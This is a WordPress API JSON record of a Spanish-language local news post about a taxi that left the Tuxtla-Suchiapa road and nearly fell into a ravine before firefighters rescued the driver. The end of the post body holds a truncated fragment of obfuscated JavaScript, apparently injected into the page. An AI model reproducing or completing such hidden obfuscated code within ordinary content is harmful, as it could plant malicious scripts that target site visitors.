{"id":13645,"date":"2024-01-16T22:43:53","date_gmt":"2024-01-16T22:43:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13645"},"modified":"2024-01-16T22:43:53","modified_gmt":"2024-01-16T22:43:53","slug":"taxi-se-sale-de-la-carretera-en-el-tramo-tuxtla-suchiapa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13645","title":{"rendered":"Taxi se sale de la carretera en el tramo Tuxtla-Suchiapa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705435961926-768x1024.jpg\" alt=\"\" class=\"wp-image-13646\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705435961926-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705435961926-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705435961926.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 16 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la ma\u00f1ana, una unidad en la modalidad de taxi que cubre la ruta Tuxtla-Villacorzo, sali\u00f3 de la carretera y se fue al barranco, a la altura del kil\u00f3metro 11+700.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor del Nissan Versa circulaba en el sentido de Norte a Sur y al ingresar a una curva perdi\u00f3 el control y se sali\u00f3 de la carretera.<\/p>\n\n\n\n<p>Posteriormente avanz\u00f3 varios metros entre la maleza y estuvo a punto de caer al barranco.<\/p>\n\n\n\n<p>Al lugar arribaron elementos del cuerpo de Bomberos para rescatar al conductor y trasladarlo a un hospital particular para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Finalmente una gr\u00faa particular se encarg\u00f3 de hacer las maniobras y sacar la unidad que fue puesta a disposici\u00f3n de las autoridades competentes para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 16 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la ma\u00f1ana, una unidad en la modalidad de taxi que cubre la ruta Tuxtla-Villacorzo, sali\u00f3 de la carretera y se fue al barranco, a la altura del kil\u00f3metro 11+700. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13646,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-13645","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13645","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13645"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13645\/revisions"}],"predecessor-version":[{"id":13647,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13645\/revisions\/13647"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13646"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13645"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13645"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13645"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}